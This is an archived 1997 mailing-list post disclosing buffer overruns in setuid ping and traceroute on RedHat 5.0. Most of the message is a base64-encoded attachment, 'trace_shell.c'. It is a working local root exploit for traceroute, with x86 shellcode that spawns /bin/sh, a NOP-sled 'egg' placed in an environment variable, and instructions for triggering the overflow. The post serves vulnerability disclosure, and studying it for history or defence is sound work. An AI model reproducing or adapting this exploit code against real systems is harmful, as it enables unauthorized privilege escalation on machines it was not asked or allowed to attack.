 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
X-RDate: Tue, 23 Dec 1997 12:40:55 +0500 (ESK) Date: Sat, 13 Dec 1997 13:19:04 -0700 From: Wilton Wong - ListMail <listmail@NOVA.BLACKSTAR.NET> To: best-of-security@cyber.com.au Subject: BoS: Buffer Overrun in RedHat 5.0 This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1271824655-1441708142-882044343=:16755 Content-Type: TEXT/PLAIN; charset=US-ASCII Just going though some setuid things and noticed that in RedHat 5.0 you can overrun the buffers in /bin/ping and /usr/sbin/traceroute, I attached an exploit for traceroute nothing fancy just what I had to test it with simple eggshell. Sorry if this has been mentioned before.. -- Wilton ------------------------------------------------------------------------- Wilton Wong BlackStar Communications URL: http://www.blackstar.net 16121 - 57 Street Email: wwong@blackstar.net Edmonton AB T5Y 2T1 Tel: (403) 486-7783 Fax: (403) 484-6004 ------------------------------------------------------------------------- --1271824655-1441708142-882044343=:16755 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="trace_shell.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.3.96.971213131903.16755C@nova.blackstar.net> Content-Description: exploit LyoNCg0KICAgSnVzdCBZb3VyIFN0YW5kYXJkIEVHR1NIRUxMIFByb2dnaWU6 DQogICB0cmFjZXJvdXRlIGJ1ZmZlciBvdmVyZmxvdyBleHBsb2l0IGZvciBS ZWRIYXQgTGludXggNS4wDQogICBtb3N0bHkgcmlwcGVkIGZyb20gQWxlcGgg T25lIDxhbGVwaDFAdW5kZXJncm91bmQub3JnPg0KDQogICBXaWx0b24gV29u Zw0KICAgd3dvbmdAYmxhY2tzdGFyLm5ldA0KDQogICBnY2MgLW8gdHJhY2Vf c2hlbGwgdHJhY2Vfc2hlbGwuYw0KDQoqLw0KI2luY2x1ZGUgPHN0ZGxpYi5o Pg0KDQojZGVmaW5lIERFRkFVTFRfT0ZGU0VUICAgICAgICAgICAgICAgICAw DQojZGVmaW5lIERFRkFVTFRfQlVGRkVSX1NJWkUgICAgICAgICAgICAxMDE5 DQojZGVmaW5lIERFRkFVTFRfRUdHX1NJWkUgICAgICAgICAgICAgICAyMDQ4 DQojZGVmaW5lIE5PUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAweDkw DQoNCmNoYXIgc2hlbGxjb2RlW10gPQ0KICAgICAgICAiXHhlYlx4MWZceDVl XHg4OVx4NzZceDA4XHgzMVx4YzBceDg4XHg0Nlx4MDdceDg5XHg0Nlx4MGNc eGIwXHgwYiINCiAgICAgICAgIlx4ODlceGYzXHg4ZFx4NGVceDA4XHg4ZFx4 NTZceDBjXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4XHg0MFx4Y2QiDQogICAg ICAgICJceDgwXHhlOFx4ZGNceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0KdW5z aWduZWQgbG9uZyBnZXRfc3Aodm9pZCkgew0KICAgX19hc21fXygibW92bCAl ZXNwLCVlYXgiKTsNCn0NCg0Kdm9pZCBtYWluKGludCBhcmdjLCBjaGFyICph cmd2W10pIHsNCiAgY2hhciAqYnVmZiwgKnB0ciwgKmVnZzsNCiAgbG9uZyAq YWRkcl9wdHIsIGFkZHI7DQogIGludCBvZmZzZXQ9REVGQVVMVF9PRkZTRVQs IGJzaXplPURFRkFVTFRfQlVGRkVSX1NJWkU7DQogIGludCBpLCBlZ2dzaXpl PURFRkFVTFRfRUdHX1NJWkU7DQoNCiAgaWYgKGFyZ2MgPiAxKSBic2l6ZSAg PSBhdG9pKGFyZ3ZbMV0pOw0KICBpZiAoYXJnYyA+IDIpIG9mZnNldCA9IGF0 b2koYXJndlsyXSk7DQogIGlmIChhcmdjID4gMykgZWdnc2l6ZSA9IGF0b2ko YXJndlszXSk7DQoNCiAgaWYgKCEoYnVmZiA9IG1hbGxvYyhic2l6ZSkpKSB7 DQogICAgcHJpbnRmKCJDYW4ndCBhbGxvY2F0ZSBtZW1vcnkuXG4iKTsNCiAg ICBleGl0KDApOw0KICB9DQogIGlmICghKGVnZyA9IG1hbGxvYyhlZ2dzaXpl KSkpIHsNCiAgICBwcmludGYoIkNhbid0IGFsbG9jYXRlIG1lbW9yeS5cbiIp Ow0KICAgIGV4aXQoMCk7DQogIH0NCg0KICBhZGRyID0gZ2V0X3NwKCkgLSBv ZmZzZXQ7DQogIHByaW50ZigiVXNpbmcgYWRkcmVzczogMHgleFxuIiwgYWRk cik7DQogDQogIHB0ciA9IGJ1ZmY7DQogIGFkZHJfcHRyID0gKGxvbmcgKikg cHRyOw0KICBmb3IgKGkgPSAwOyBpIDwgYnNpemU7IGkrPTQpDQogICAgKihh ZGRyX3B0cisrKSA9IGFkZHI7DQoNCiAgcHRyID0gZWdnOw0KICBmb3IgKGkg PSAwOyBpIDwgZWdnc2l6ZSAtIHN0cmxlbihzaGVsbGNvZGUpIC0gMTsgaSsr KQ0KICAgICoocHRyKyspID0gTk9QOw0KDQogIGZvciAoaSA9IDA7IGkgPCBz dHJsZW4oc2hlbGxjb2RlKTsgaSsrKQ0KICAgICoocHRyKyspID0gc2hlbGxj b2RlW2ldOw0KDQogIGJ1ZmZbYnNpemUgLSAxXSA9ICdcMCc7DQogIGVnZ1tl Z2dzaXplIC0gMV0gPSAnXDAnOw0KDQogIG1lbWNweShlZ2csIkVHRz0iLDQp Ow0KICBwdXRlbnYoZWdnKTsNCiAgbWVtY3B5KGJ1ZmYsIlJFVD0iLDQpOw0K ICBwdXRlbnYoYnVmZik7DQogIHByaW50ZigiTm93IHJ1bjogL3Vzci9zYmlu L3RyYWNlcm91dGUgJFJFVFxuIik7DQogIHN5c3RlbSgiL2Jpbi9iYXNoIik7 DQp9DQogIA0KDQo= --1271824655-1441708142-882044343=:16755--
| |||||||||||||||||||||